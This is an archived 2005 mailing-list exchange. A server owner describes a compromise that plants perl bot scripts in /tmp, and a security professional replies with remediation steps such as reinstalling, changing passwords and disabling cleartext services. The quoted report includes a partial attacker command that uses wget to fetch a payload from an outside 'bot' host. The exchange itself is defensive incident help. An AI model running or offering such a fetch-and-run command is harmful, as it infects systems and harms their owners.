Server compromissed
Leonard Isham
leonard.isham at gmail.com
Fri Feb 18 14:51:19 UTC 2005
On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
<paul at topguncomputers.com> wrote:
> Apparently someone has hacked into my webserver. And is installing perl
> scripts into he /tmp/ directory. There usually named .linuxday* or
> .cinta* and a few other names as well.
>
> >From what I can tell something is causing apache to run a command like "sh
> wget bot.linuxday.com.br -O {the above mentioned files are than listed}"
>
> sometimes the site is worm.linuxday.com.br
>
> I'm curious if anyone has heard about this before. I'm currently running
> Fedora 1 with all the latests security patches.
The only way to ensure your system is clean, and likely to remain clean, is to:
1. Do a bare metal install
2. Change all passwords to new strong passwords
3. Disable cleartext services, ftp, telnet, rsh, etc.
4. Disable root remote login (use su or sudo)
5. Restore your uncompromised data
6. etc.
I had to do this for a client and the next 3 days the intruder tried
to get back in.
--
Leonard Isham, CISSP
Ostendo non ostento.
More information about the users
mailing list